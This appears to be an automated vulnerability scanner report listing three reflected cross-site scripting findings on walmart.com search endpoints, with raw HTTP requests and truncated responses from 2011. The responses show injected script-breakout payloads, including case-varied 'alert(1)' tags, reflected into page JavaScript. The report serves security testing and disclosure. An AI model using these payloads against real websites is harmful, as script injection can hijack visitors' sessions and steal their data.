1. Cross-site scripting (reflected)
1.1. http://www.walmart.com/search/ [search_query parameter]
1.2. http://www.walmart.com/search/dynamicupdate [request_tabs parameter]
1.3. http://www.walmart.com/search/search-ng.do [search_query parameter]
Severity: | High |
Confidence: | Certain |
Host: | http://www.walmart.com |
Path: | /search/ |
GET /search/?ic=16_0&search Host: www.walmart.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html;charset=ISO Date: Thu, 29 Dec 2011 16:18:32 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: dcenv=ndc; path=/; domain=walmart.com Set-Cookie: SSLB=0; path=/; domain=.walmart.com Content-Length: 229382 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en-US"> <head> <title> - Walmart</tit ...[SNIP]... T.page.isPreferredSt WALMART.page.writeBr WALMART.cart.wmHost = "//www.walmart.com"; WALMART.page.search_query = "tv cd palyer blueray9662f</script><script WALMART.page.isTypeA WALMART.page.isSearc WALMART.page.isPolar ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.walmart.com |
Path: | /search/dynamicupdate |
GET /search/dynamicupdate Host: www.walmart.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Content-Type: application/json X-Requested-With: XMLHttpRequest Referer: http://www.walmart.com Cookie: SSLB=0; SSID=BQAkQBsAAAAAAAA Content-Length: 10 |
HTTP/1.1 200 OK Server: Apache Pragma: no-cache Last-Modified: Thu, 29 Dec 2011 15:58:51 GMT Content-Length: 86 Content-Type: application/json;charset Cache-Control: no-cache, no-store Expires: Thu, 29 Dec 2011 15:58:51 GMT Date: Thu, 29 Dec 2011 15:58:51 GMT Connection: close Vary: Accept-Encoding {"All":"1097","Online": |
Severity: | High |
Confidence: | Certain |
Host: | http://www.walmart.com |
Path: | /search/search-ng.do |
GET /search/search-ng.do Host: www.walmart.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.walmart.com/ Cookie: SSLB=0; SSID=BQAkQBsAAAAAAAA Content-Length: 10 |
HTTP/1.1 200 OK Server: Apache Pragma: no-cache Last-Modified: Thu, 29 Dec 2011 15:59:17 GMT Content-Length: 289400 Content-Type: text/html;charset=ISO Cache-Control: no-cache Expires: Thu, 29 Dec 2011 15:59:17 GMT Date: Thu, 29 Dec 2011 15:59:17 GMT Connection: close Vary: Accept-Encoding <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en-US"> <head> <script> var t_page_start = new Date().getTime(); (function() { var b = document.c ...[SNIP]... mpaignId(); s_omni.prop1="Search"; s_omni.prop2="Search - Partial Match"; s_omni.prop3="Search"; s_omni.prop4="Search"; s_omni.prop5="Search"; s_omni.prop8="Search"; s_omni.prop14="tv cd palyer blueray33829</ScRiPt ><ScRiPt>alert(1)</ScRiPt s_omni.prop16="757"; s_omni.prop31="Standard Search: Default"; s_omni.prop37=""; s_omni.prop39="Store Not Selected"; s_omni.prop41="Entire Site"; s_omni.prop42="Search"; s_omni.prop45="Standard Sear ...[SNIP]... |